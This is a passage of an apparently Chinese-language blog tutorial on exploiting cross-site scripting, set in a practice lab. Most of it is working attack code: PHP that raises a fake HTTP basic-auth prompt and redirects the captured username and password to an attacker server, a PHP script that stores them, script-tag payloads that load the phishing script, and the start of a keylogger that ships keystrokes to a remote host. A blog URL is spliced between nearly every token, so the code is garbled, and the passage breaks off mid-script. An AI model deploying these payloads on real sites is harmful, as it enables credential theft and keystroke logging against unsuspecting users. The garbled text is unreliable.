classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/id<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/time<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/username<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/password<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"2"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/referer<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"2"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/操作<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/td>https://blog.csdn.net/qq_45555226/article/details/        <https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/tr>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/phphttps://blog.csdn.net/qq_45555226/article/details/     $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"select * from fish"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    whilehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_fetch_assochttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$resulthttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/$htmlhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/<<<https://blog.csdn.net/qq_45555226/article/details/Ahttps://blog.csdn.net/qq_45555226/article/details/            {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'time'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'username'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'password'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/        {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'referer'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/         {https://blog.csdn.net/qq_45555226/article/details/$datahttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/">刪除    A;https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/                 echohttps://blog.csdn.net/qq_45555226/article/details/ $htmlhttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/     }https://blog.csdn.net/qq_45555226/article/details/    ?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/table>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/div>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/body>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/html>https://blog.csdn.net/qq_45555226/article/details/

(3)攻擊者原理

         攻擊者把payload發佈到留言板或者評論處,當受害者訪問該頁面的時候,就會觸發該xss漏洞,那麼基礎認證框就會彈出來,一旦用戶輸入瞭用戶名和密碼信息,就會通過username和password參數傳遞給攻擊者遠程服務器上的xfish.php頁面內,該頁面的功能就是把傳來的參數保存到攻擊者數據庫中。最後攻擊者可以通過自己的服務器上的pkxss_fish_result.php頁面,訪問得到反彈來的認證結果!!!

(4)受害者原理

         受害者訪問該留言板或評論頁面,此時會立刻觸發xss漏洞,也就是外鏈加載攻擊者遠程服務器上的fish.php腳本文件,該文件的功能就是把當前用戶的認證框的username和password等參數傳遞給攻擊者遠程服務器上的fish.php頁面,同時又把這些參數值保存到攻擊者的數據庫中以供攻擊者調用查看。

7、xss漏洞利用示例:基礎認證釣魚

(https://blog.csdn.net/qq_45555226/article/details/1)靶機: http://www.webtester.com/xss/xss02.php

(2)攻擊者WEB服務器:

攻擊者IP:www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/coolhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/域名對應的IP https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/攻擊者WEB服務的目錄:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/xfish/https://blog.csdn.net/qq_45555226/article/details/攻擊者存放提供基礎認證框的php惡意腳本:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/xfish/https://blog.csdn.net/qq_45555226/article/details/fish.https://blog.csdn.net/qq_45555226/article/details/php攻擊者存放接收認證結果的php文件:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/xfish/https://blog.csdn.net/qq_45555226/article/details/xfish.https://blog.csdn.net/qq_45555226/article/details/php攻擊者存放讀取認證結果的php文件:http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/cool/https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/pikachu/https://blog.csdn.net/qq_45555226/article/details/pkxss/https://blog.csdn.net/qq_45555226/article/details/xfish/https://blog.csdn.net/qq_45555226/article/details/pkxss_fish_result.https://blog.csdn.net/qq_45555226/article/details/php

(3)fish.php提供基礎認證框

<?phphttps://blog.csdn.net/qq_45555226/article/details/error_reportinghttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/// var_dump($_SERVER);https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_USER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ ||https://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_PW'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details///發送認證框,並給出迷惑性的infohttps://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'Content-type:text/html;charset=utf-8'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"WWW-Authenticate: Basic realm='認證'"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'HTTP/https://blog.csdn.net/qq_45555226/article/details/1.0 40https://blog.csdn.net/qq_45555226/article/details/1 Unauthorized'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    echohttps://blog.csdn.net/qq_45555226/article/details/ 'Authorization Required.'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    exithttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/ elsehttps://blog.csdn.net/qq_45555226/article/details/ ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_USER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_PW'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details///將結果發送給搜集信息的後臺,請將這裡的IP地址修改為管理後臺的IPhttps://blog.csdn.net/qq_45555226/article/details/    //echo$_SERVER['PHP_AUTH_USER'];https://blog.csdn.net/qq_45555226/article/details///echo$_SERVER['PHP_AUTH_PW'];https://blog.csdn.net/qq_45555226/article/details/headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Location: http://www.exploit.cool/exp/pikachu/pkxss/xfish/xfish.php?username={https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/PHP_AUTH_USERhttps://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/&password={https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/PHP_AUTH_PWhttps://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(4)xfish.php讀取並保存認證結果

<?phphttps://blog.csdn.net/qq_45555226/article/details/error_reportinghttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/emptyhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'username'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ !https://blog.csdn.net/qq_45555226/article/details/emptyhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'password'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/     $usernamehttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'username'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $passwordhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'password'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $refererhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/""https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $refererhttps://blog.csdn.net/qq_45555226/article/details/.=https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'HTTP_REFERER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $timehttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/datehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'Y-m-d g:i:s'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"insert fish(time,username,password,referer)     values('$timehttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$usernamehttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$passwordhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$refererhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/')"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/ ?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(5)攻擊者的payload

payload-https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/payload-https://blog.csdn.net/qq_45555226/article/details/2https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"//www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/payload-https://blog.csdn.net/qq_45555226/article/details/3https://blog.csdn.net/qq_45555226/article/details/:未測試<https://blog.csdn.net/qq_45555226/article/details/img src=https://blog.csdn.net/qq_45555226/article/details/"http://www.exploit.cool/exp/pikachu/pkxss/xfish/fish.php"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/ 

(6)利用過程

第一步:模擬攻擊者把payload發佈到留言板,當受害則訪問該頁面的時候,觸發該xss漏洞。

第二步:模式受害者訪問該留言板頁面

第三步:模擬攻擊者通過自己的WEB服務器上的pkxss_fish_result.php頁面讀取認證結果

或者攻擊者通過數據庫查看反彈的用戶賬號數據


(7)註意:PHP 的 HTTP 認證機制僅在 PHP 以 Apache 模塊方式運行時才有效,因此該功能不適用於 CGI 版本(且phpstudy的nts模式下也不不能使用)。在 Apache 模塊的 PHP 腳本中,可以用 header() 函數來向客戶端瀏覽器發送“Authentication Required”信息,使其彈出一個用戶名/密碼輸入窗口。當用戶輸入用戶名和密碼後,包含有 URL 的 PHP 腳本將會再次和預定義變量 PHP_AUTH_USER、PHP_AUTH_PW 和 AUTH_TYPE 一起被調用,這三個變量分別被設定為用戶名,密碼和認證類型。預定義變量保存在 $_SERVER 或者 $HTTP_SERVER_VARS 數組中。系統僅支持“基本的”認證。

8、xss漏洞利用原理:鍵盤記錄器

(https://blog.csdn.net/qq_45555226/article/details/1)跨域-同源策略

(2)什麼才叫做同源?

         答:兩個頁面地址中的協議域名/ip地址端口號一致,則表示同源。(也就是五元組

(3)為什麼要使用同源策略?

         答:設置同源策略的主要目的是為瞭安全,如果沒有同源限制,在瀏覽器中的cookie等其他數據可以任意讀取,不同域下的DOM任意操作,ajax任意請求其他網站的數據,包括隱私數據。

(4)讀取鍵盤數據的rk.js惡意腳本

功能:該腳本讀取受害者的鍵盤記錄然後傳入到攻擊者遠程服務器的rkserver.php頁面內,該頁面又把數據保存到攻擊者的數據庫中。

/** * Created by runner on 20https://blog.csdn.net/qq_45555226/article/details/18/7/8. */https://blog.csdn.net/qq_45555226/article/details/functionhttps://blog.csdn.net/qq_45555226/article/details/ createAjaxhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    varhttps://blog.csdn.net/qq_45555226/article/details/ request=https://blog.csdn.net/qq_45555226/article/details/falsehttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/window.https://blog.csdn.net/qq_45555226/article/details/XMLHttpRequest)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/        request=https://blog.csdn.net/qq_45555226/article/details/newhttps://blog.csdn.net/qq_45555226/article/details/ XMLHttpRequesthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/request.https://blog.csdn.net/qq_45555226/article/details/overrideMimeType)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/            request.https://blog.csdn.net/qq_45555226/article/details/overrideMimeTypehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"text/xml"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/elsehttps://blog.csdn.net/qq_45555226/article/details/ ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/window.https://blog.csdn.net/qq_45555226/article/details/ActiveXObject)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/        varhttps://blog.csdn.net/qq_45555226/article/details/ versions=https://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'Microsoft.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'Msxml2.XMLHTTP.7.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/'Msxml2.XMLHTTP.6.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/'Msxml2.XMLHTTP.5.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'Msxml2.XMLHTTP.4.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML2.XMLHTTP.3.0'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ 'MSXML2.XMLHTTP'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/        forhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ i=https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ i<https://blog.csdn.net/qq_45555226/article/details/versions.https://blog.csdn.net/qq_45555226/article/details/length;https://blog.csdn.net/qq_45555226/article/details/ i++https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/            tryhttps://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                request=https://blog.csdn.net/qq_45555226/article/details/newhttps://blog.csdn.net/qq_45555226/article/details/ ActiveXObjecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/versions[https://blog.csdn.net/qq_45555226/article/details/i]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/                ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/request)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                    returnhttps://blog.csdn.net/qq_45555226/article/details/ request;https://blog.csdn.net/qq_45555226/article/details/                }https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/catchhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/e)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/                request=https://blog.csdn.net/qq_45555226/article/details/falsehttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/            }https://blog.csdn.net/qq_45555226/article/details/        }https://blog.csdn.net/qq_45555226/article/details/    }https://blog.csdn.net/qq_45555226/article/details/    returnhttps://blog.csdn.net/qq_45555226/article/details/ request;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ 